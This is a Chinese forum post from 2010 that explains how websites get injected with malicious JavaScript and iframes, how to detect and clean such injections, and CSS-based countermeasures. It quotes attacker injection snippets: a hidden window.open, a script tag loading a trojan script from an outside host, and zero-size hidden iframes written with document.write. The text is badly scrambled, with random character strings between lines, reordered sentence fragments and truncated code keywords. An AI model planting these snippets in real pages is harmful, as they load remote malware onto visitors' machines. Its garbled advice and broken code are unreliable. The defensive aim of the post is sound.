帖子
查看: 11184|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

( Y6 G& _- R3 P* c" p( u9 G

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

4 |: l! n% u+ x5 z1 A& |

IFRAME 和 JS 脚本挂马。

& G: h, _- V- ^0 \

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

3 C) `8 u6 p1 M. V8 [# |; w

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

/ a4 C( p/ _: o

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

, _4 V+ G2 o, h* E$ j& p! \- P

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

$ x, O1 ?' j; g }

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

! W- P+ x6 c; r5 Z

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

, n/ ~8 q( J4 v5 P- Y5 B

。一千多位会员的 ID

4 K+ @2 ?' f2 ^

2: 如何检测网页是否被挂马。

5 f; d: v$ m7 H5 S, \( M7 g

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

+ Y' _. F4 M& [& _$ O) Y- ]

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

; r4 Y" d' y: H3 O8 Y! @4 W |

因素。
2 googl 检测。>

, g% ], P6 ^3 ~

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

! N a; M( d1 s5 b

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

8 O! R* q4 r2 N3 \" h1 ^

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

0 ]1 P8 D/ K1 U* z7 q4 G ^& e

) n$ F# d1 B$ [

3: 如何清除网页木马。

0 L* Q2 \ [: r! G$ I8 E

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

+ k" e' W/ s3 i

入源文件把相关的网页挂马种类的可疑代码删除。

$ _+ k( P1 q$ G5 ]3 O# F. q3 Z

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

% M6 F' }4 j! U1 `! P( q

悉。>

5 B" M8 v2 a7 p8 f! D: m e0 p

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

4 ~: B1 O0 ~# g0 m

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

8 c* _1 E1 [' i

2 保证你所使用的顺序及时的更新。

& w6 L4 \, @$ Q4 ?' F: f

3 不要在前台网页上加注后台管理程序登陆页面的链接。

% h2 K' E- P O/ Z

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

U( |' B) t4 n' e3 A

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

. u3 W& `. c& g3 @

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

9 ~) ~, E$ {: Z/ P3 _

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

' e4 `9 p* ~4 Y/ E

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

/ z9 C# {+ ~- q0 f

# H( y) R j% x

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

{5 S. E1 x* r( l' j. y

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

! I6 G; L+ X0 A7 r: e

JS 挂马溯源

5 h: p' ]& q4 c; `& b$ p

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

( h6 o& m- _) J/ B! L8 z

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

' _6 h% t% W, ^' e$ z0 B( _

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

1 Y+ v9 _/ v8 W

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

2 |' {& {, ~( a6 {- w

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

$ m! f2 x9 [4 j- \) K9 s# c3 Y

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

% ^3 g0 M7 y6 @

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

4 s7 A% A$ _: l+ R O2 T" z r3 h

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

( b7 s- N" ]. ~9 j2 o* j( @" n

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

6 V5 N' {1 L' r

脚本在工作中会有很大的协助。

+ X" N, ^; `" Z) O9 Z( O, W9 x

挂马原理一点通

& l, d8 b$ k! X7 G+ g

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

1 R" j4 H+ e) V, Z8 b

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

) ?) \- e1 k% ^- C% U4 j( G, w

无从区分木马在何处。

, k/ `! o) N! L# A4 F5 V! O

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

8 d6 @- A+ l( {

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

9 ~5 {/ n+ L c A

容易蒙混过关,导致木马久杀不绝。

" e- D7 A% K+ p: ~

JS 挂马攻防实录

g9 E' W/ }2 a6 r

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

6 N1 I4 y8 ^' R/ n" \; _

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

1 T! f8 p. w& B# z C+ N( T- E

这种方法使用的关键代码如下:

* X4 k, ]! ?* N# X$ ]' V0 A

"",  window.open "http://www.v404.cn/ 木马

' Q; t# l5 m/ D+ A+ o) M

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

+ I( m% `' h7 g

P% u3 h& ^ t" ^# c8 a. J8 M* i

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

5 G7 u) _# B: N* ]1 b

但是设置为 0 后,可能会出现恶意代码不运行的情况。

2 E0 y5 N4 _3 G& H: T2 v

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

: Q8 @; C" e+ t& ]% U

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

J+ f7 B1 Y) e; D+ C2 |! J% `( R

/ N" s0 Q! j/ w- X( c3 G- E+ O

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

/ e" ]0 z) D9 D n6 V( }. |

) i/ w' c% |( ^2 x

或者

( {9 _3 p# v* p4 N- S5 I4 F" J

document.writ "<div style='display:none'>"

5 ?. w l5 l" N5 u( h

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

) N- Q# ?2 s$ R

document.writ "</div>"
 

; w5 v3 a1 Y: Y" \4 C1 k1 z

9 W1 y, f: x, t8 n) Z

就成功地将木马挂到对方的网页中了

% u: I9 _- o( W# O, n8 T

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

3 A [ f+ A# c8 X! g: v

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

5 j) o1 R3 F9 _) j( t- U1 V

或者:

6 W, P. K* n9 l Q" g) y$ H9 q

<ifram src="vbscript:[ 挂马脚本 ]">

; m4 W4 O$ \, t# v. Y

& I! x, r' c: p


等等 …

2 w5 I) @; g: T. o9 k

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

+ P" @6 X; [# l) L# D

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

& S' V' c" B8 b. R" p/ w/ Q

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

|% d$ O' c2 o' u

;}

( r, s1 F7 F5 P( p9 Y

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

, v+ e$ M" Q" [/ }- L e1 g% c) r

* ^- h# ~; N5 y0 B7 J% b% M6 |

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

/ d8 H/ X) L9 d$ v8 L

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

1 S' F0 e, ^$ i! @8 H; ` n

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

8 X- W2 n0 s- j0 J d

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

5 w+ N/ j9 N9 V) H: z" x2 T

<title> 让 JS 挂马中止的 CSS 代码 </title>

1 D R7 q! Y2 h' N

<styl type="text/css" id="shudoo">

! m$ p$ v# D5 G" h

/*<![CDATA[*/

3 I6 ]* I/ B& u) e, {: U+ H9 T

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

i' V% j8 A' y, V8 O

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

4 W: T! U' C9 G

/*]]>*/

, o+ d2 E( m, u1 y' B

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表